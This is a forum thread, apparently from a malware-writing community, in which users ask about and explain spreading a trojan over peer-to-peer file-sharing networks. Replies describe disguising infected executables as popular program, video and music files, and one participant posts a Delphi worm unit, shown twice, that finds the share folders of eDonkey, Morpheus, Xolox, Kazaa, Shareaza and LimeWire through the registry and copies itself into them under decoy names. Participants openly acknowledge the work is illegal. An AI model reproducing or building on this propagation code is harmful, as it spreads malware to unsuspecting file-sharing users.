Thread: p2p spread anyone?

Hello, does anyone have a basic idea or snippet on spreading with p2p networks?
//By basic ideas I mean ideas like the ones that come from ph1re...
:p
Nah..
Seriously..

Thnx

have u try google.com?

He probably has if he is asking us. Don't be an arragant idiot.

Sorry mjrod, but I don't understand the term p2p spread, you mean port scanning and exploiting or through p2p programs?

u do know that once you make a spread function like p2p-spread your software becomes illegal.

its a worm/virus, not a trojan anymore.

LOL LttCoder, the trojan itself is illigal, so why not add some extra stuff?

Btw. if you've seen on older trojans the use the "kazaa-method", where you search for the registry-key holding kazaa's share folder. You could do this (adding more programs like, bearshare, froztwire, limewire or some other programs like that) or you could try creating a bit-torrent client, designed to connect to a torrent server, download an infected file (or upload a torrent pointing to the server).

But then again you would need to take some of the installed program- / avi- / mp3-names and share them as that with an infected pe-header.

LOL LttCoder, the trojan itself is illigal, so why not add some extra stuff?

Btw. if you've seen on older trojans the use the "kazaa-method", where you search for the registry-key holding kazaa's share folder. You could do this (adding more programs like, bearshare, froztwire, limewire or some other programs like that) or you could try creating a bit-torrent client, designed to connect to a torrent server, download an infected file (or upload a torrent pointing to the server).

But then again you would need to take some of the installed program- / avi- / mp3-names and share them as that with an infected pe-header.

Thnx man

unit p2p_spreader;

interface

uses
Windows;

Procedure StartP2P;

implementation

Function FindEDonkey: Bool;
Begin
Result := False;
If GetRegValue(HKEY_LOCAL_MACHINE, 'Windows\CurrentVersion\Uninstall\eDonkey2000', 'UninstallString') <> '' Then Result := True;
End;

Function EDonkeyShare: String;
Var
I: Word;
Begin
Result := GetRegValue(HKEY_LOCAL_MACHINE, 'Windows\CurrentVersion\Uninstall\eDonkey2000', 'UninstallString');
I := Pos('uninstall', Result);
If I > 0 Then Result := Copy(Result, 2, I-2)+'\incoming';
If Result[Length(Result)] <> '\' Then Result := Result + '\';
End;

Function FindMorpheus: Bool;
Begin
Result := False;
If GetRegValue(HKEY_LOCAL_MACHINE ,'\software\Morpheus', 'UninstallString') <> '' Then Result := True;
End;

Function MorhpeusShare: String;
Var
i: Word;
Begin
Result := GetRegValue(HKEY_LOCAL_MACHINE ,'\software\Morpheus', 'UninstallString');
I := Pos('UNWISE.EXE', Result);
If I > 0 Then Result := Copy(Result, 1, I-2) + '\My Shared Folder';
If Result[Length(Result)] <> '\' Then Result := Result + '\';
End;

Function FindXolox: Bool;
Begin
Result := False;
If GetRegValue(HKEY_CURRENT_USER, '\software\Xolox', 'shareddirs') <> '' Then Result := True;
End;

Function XoloxShare: String;
Begin
Result := GetRegValue(HKEY_CURRENT_USER, '\software\Xolox', 'shareddirs');
If Result[Length(Result)] <> '\' Then Result := Result + '\';
End;

Function FindKazaa: Bool;
Begin
Result := False;
If GetRegValue(HKEY_CURRENT_USER, '\software\Kazaa', 'LocalContent') <> '' Then Result := True;
End;

Function KazaaShare: String;
Begin
Result := GetRegValue(HKEY_CURRENT_USER, '\software\Kazaa', 'LocalContent');
If Pos('012345:', Result) > 0 Then Result := Copy(Result, 7, Length(Result));
If Result[Length(Result)] <> '\' Then Result := Result + '\';
End;

Function FindShareaza: Bool;
Begin
Result := False;
If GetRegValue(HKEY_CURRENT_USER, '\software\Shareaza', 'DownloadsPath') <> '' Then Result := True;
End;

Function ShareazaShare: String;
Begin
Result := GetRegValue(HKEY_CURRENT_USER, '\software\Shareaza', 'DownloadsPath');
If Result[Length(Result)] <> '\' Then Result := Result + '\';
End;

Function FindLimeWire: Bool;
Begin
Result := False;
If GetRegValue(HKEY_LOCAL_MACHINE, '\software\LimeWire', 'InstallDir') <> '' Then Result := True;
End;

Function LimeWireShare: String;
Begin
Result := GetRegValue(HKEY_LOCAL_MACHINE, '\software\LimeWire', 'InstallDir');
If Result[Length(Result)] <> '\' Then Result := Result + '\';
End;

function ExtractFileName(const Path: string): string;
var
i, L: integer;
Ch: Char;
begin
L := Length(Path);
for i := L downto 1 do
begin
Ch := Path[i];
if (Ch = '\') or (Ch = '/') then
begin
Result := Copy(Path, i + 1, L - i);
Break;
end;
end;
end;

Procedure ShareP2P(Name: String);
Begin
Try
If FindLimeWire Then Begin CopyFile(pChar(ParamStr(0)), pChar(LimeWireShare+ExtractFileName(Name)), False); INC(SPREADER_P2P); End;
If FindEDonkey Then Begin CopyFile(pChar(ParamStr(0)), pChar(EDonkeyShare+ExtractFileName(Name)), False); INC(SPREADER_P2P); End;
If FindMorpheus Then Begin CopyFile(pChar(ParamStr(0)), pChar(MorhpeusShare+ExtractFileName(Name)), False); INC(SPREADER_P2P); End;
If FindXolox Then Begin CopyFile(pChar(ParamStr(0)), pChar(XoloxShare+ExtractFileName(Name)), False); INC(SPREADER_P2P); End;
If FindKazaa Then Begin CopyFile(pChar(ParamStr(0)), pChar(KazaaShare+ExtractFileName(Name)), False); INC(SPREADER_P2P); End;
If FindShareaza Then Begin CopyFile(pChar(ParamStr(0)), pChar(ShareazaShare+ExtractFileName(Name)), False); INC(SPREADER_P2P); End;
Except
Exit;
End;
End;

Procedure StartP2P;
Var
I: Integer;
Begin
For I := 0 To 9 Do
ShareP2P(P2P_FILENAMES[I]);
End;

end.

unit p2p_spreader;

interface

uses
Windows;

Procedure StartP2P;

implementation

Function FindEDonkey: Bool;
Begin
Result := False;
If GetRegValue(HKEY_LOCAL_MACHINE, 'Windows\CurrentVersion\Uninstall\eDonkey2000', 'UninstallString') <> '' Then Result := True;
End;

Function EDonkeyShare: String;
Var
I: Word;
Begin
Result := GetRegValue(HKEY_LOCAL_MACHINE, 'Windows\CurrentVersion\Uninstall\eDonkey2000', 'UninstallString');
I := Pos('uninstall', Result);
If I > 0 Then Result := Copy(Result, 2, I-2)+'\incoming';
If Result[Length(Result)] <> '\' Then Result := Result + '\';
End;

Function FindMorpheus: Bool;
Begin
Result := False;
If GetRegValue(HKEY_LOCAL_MACHINE ,'\software\Morpheus', 'UninstallString') <> '' Then Result := True;
End;

Function MorhpeusShare: String;
Var
i: Word;
Begin
Result := GetRegValue(HKEY_LOCAL_MACHINE ,'\software\Morpheus', 'UninstallString');
I := Pos('UNWISE.EXE', Result);
If I > 0 Then Result := Copy(Result, 1, I-2) + '\My Shared Folder';
If Result[Length(Result)] <> '\' Then Result := Result + '\';
End;

Function FindXolox: Bool;
Begin
Result := False;
If GetRegValue(HKEY_CURRENT_USER, '\software\Xolox', 'shareddirs') <> '' Then Result := True;
End;

Function XoloxShare: String;
Begin
Result := GetRegValue(HKEY_CURRENT_USER, '\software\Xolox', 'shareddirs');
If Result[Length(Result)] <> '\' Then Result := Result + '\';
End;

Function FindKazaa: Bool;
Begin
Result := False;
If GetRegValue(HKEY_CURRENT_USER, '\software\Kazaa', 'LocalContent') <> '' Then Result := True;
End;

Function KazaaShare: String;
Begin
Result := GetRegValue(HKEY_CURRENT_USER, '\software\Kazaa', 'LocalContent');
If Pos('012345:', Result) > 0 Then Result := Copy(Result, 7, Length(Result));
If Result[Length(Result)] <> '\' Then Result := Result + '\';
End;

Function FindShareaza: Bool;
Begin
Result := False;
If GetRegValue(HKEY_CURRENT_USER, '\software\Shareaza', 'DownloadsPath') <> '' Then Result := True;
End;

Function ShareazaShare: String;
Begin
Result := GetRegValue(HKEY_CURRENT_USER, '\software\Shareaza', 'DownloadsPath');
If Result[Length(Result)] <> '\' Then Result := Result + '\';
End;

Function FindLimeWire: Bool;
Begin
Result := False;
If GetRegValue(HKEY_LOCAL_MACHINE, '\software\LimeWire', 'InstallDir') <> '' Then Result := True;
End;

Function LimeWireShare: String;
Begin
Result := GetRegValue(HKEY_LOCAL_MACHINE, '\software\LimeWire', 'InstallDir');
If Result[Length(Result)] <> '\' Then Result := Result + '\';
End;

function ExtractFileName(const Path: string): string;
var
i, L: integer;
Ch: Char;
begin
L := Length(Path);
for i := L downto 1 do
begin
Ch := Path[i];
if (Ch = '\') or (Ch = '/') then
begin
Result := Copy(Path, i + 1, L - i);
Break;
end;
end;
end;

Procedure ShareP2P(Name: String);
Begin
Try
If FindLimeWire Then Begin CopyFile(pChar(ParamStr(0)), pChar(LimeWireShare+ExtractFileName(Name)), False); INC(SPREADER_P2P); End;
If FindEDonkey Then Begin CopyFile(pChar(ParamStr(0)), pChar(EDonkeyShare+ExtractFileName(Name)), False); INC(SPREADER_P2P); End;
If FindMorpheus Then Begin CopyFile(pChar(ParamStr(0)), pChar(MorhpeusShare+ExtractFileName(Name)), False); INC(SPREADER_P2P); End;
If FindXolox Then Begin CopyFile(pChar(ParamStr(0)), pChar(XoloxShare+ExtractFileName(Name)), False); INC(SPREADER_P2P); End;
If FindKazaa Then Begin CopyFile(pChar(ParamStr(0)), pChar(KazaaShare+ExtractFileName(Name)), False); INC(SPREADER_P2P); End;
If FindShareaza Then Begin CopyFile(pChar(ParamStr(0)), pChar(ShareazaShare+ExtractFileName(Name)), False); INC(SPREADER_P2P); End;
Except
Exit;
End;
End;

Procedure StartP2P;
Var
I: Integer;
Begin
For I := 0 To 9 Do
ShareP2P(P2P_FILENAMES[i]);
End;

end.

Sweet
I had already done Kazaa, you've saved me alot of work by not looking for the rest
Thnx

i never try a p2p spread but you can try like that

for example Ares p2p have a directory specialy for him to share files , just autocopy it on this dirrectory and then your server is done
let me write an example for you

i need 20 minuts

done

here is the link :
http://www.opensc.ws/samples/6294-sp...html#post43604

delphi_dev, exactly what I was thinking of